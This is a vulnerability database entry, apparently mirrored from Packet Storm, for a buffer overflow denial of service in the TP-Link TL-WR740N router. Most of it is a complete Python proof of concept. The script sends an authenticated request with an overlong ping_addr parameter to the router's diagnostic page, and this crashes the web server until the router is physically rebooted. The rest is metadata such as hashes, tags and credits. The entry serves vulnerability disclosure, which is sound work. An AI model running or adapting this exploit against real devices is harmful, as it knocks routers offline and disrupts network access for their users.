ID

VAR-E-202403-0059


TITLE

TP-Link TL-WR740N Buffer Overflow / Denial Of Service

Trust: 0.5

sources: PACKETSTORM: 177515

DESCRIPTION

There exists a buffer overflow vulnerability in the TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request.

Trust: 0.5

sources: PACKETSTORM: 177515

AFFECTED PRODUCTS

vendor:tp linkmodel:tl-wr740nscope: - version: -

Trust: 0.5

sources: PACKETSTORM: 177515

EXPLOIT

# Exploit Title: TP-Link TL-WR740N - Buffer Overflow 'DOS'
# Date: 8/12/2023
# Exploit Author: Anish Feroz (ZEROXINN)
# Vendor Homepage: http://www.tp-link.com
# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n
# Tested on: TP-Link TL-WR740N

#Description:

#There exist a buffer overflow vulnerability in TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router.

#Usage:

#python3 target username password
#change port, if required

------------------------------------------------POC-----------------------------------------

#!/usr/bin/python

import requests
from requests.auth import HTTPBasicAuth
import base64

def send_request(ip, username, password):
auth_url = f"http://{ip}:8082"
target_url = f"http://{ip}:8082/userRpm/PingIframeRpm.htm?ping_addr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20"

credentials = f"{username}:{password}"
encoded_credentials = base64.b64encode(credentials.encode()).decode()

headers = {
"Host": f"{ip}:8082",
"Authorization": f"Basic {encoded_credentials}",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": f"http://{ip}:8082/userRpm/DiagnosticRpm.htm",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}

session = requests.Session()

response = session.get(target_url, headers=headers)

if response.status_code == 200:
print("Server Crashed")
print(response.text)
else:
print(f"Script Completed with status code {response.status_code}")

ip_address = input("Enter IP address of the host: ")
username = input("Enter username: ")
password = input("Enter password: ")

send_request(ip_address, username, password)

Trust: 0.5

sources: PACKETSTORM: 177515

EXPLOIT HASH

LOCAL

SOURCE

md5: 8a248cd1af860bbc31b280d6c1267f88
sha-1: b1959396e7dd8239f8b9630a78d8ed2199967f42
sha-256: 1ffb14b7cc151eb147dfc888b64259bdf2c04d3a6a304b037e87c8e84424acb5
sha-256: 1ffb14b7cc151eb147dfc888b64259bdf2c04d3a6a304b037e87c8e84424acb5

Trust: 0.5

sources: PACKETSTORM: 177515

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 177515

TYPE

overflow

Trust: 0.5

sources: PACKETSTORM: 177515

TAGS

tag:exploit

Trust: 0.5

tag:web

Trust: 0.5

tag:denial of service

Trust: 0.5

tag:overflow

Trust: 0.5

sources: PACKETSTORM: 177515

CREDITS

Anish Feroz

Trust: 0.5

sources: PACKETSTORM: 177515

EXTERNAL IDS

db:PACKETSTORMid:177515

Trust: 0.5

sources: PACKETSTORM: 177515

SOURCES

db:PACKETSTORMid:177515

LAST UPDATE DATE

2024-03-21T15:36:29.805000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:177515date:2024-03-11T14:50:22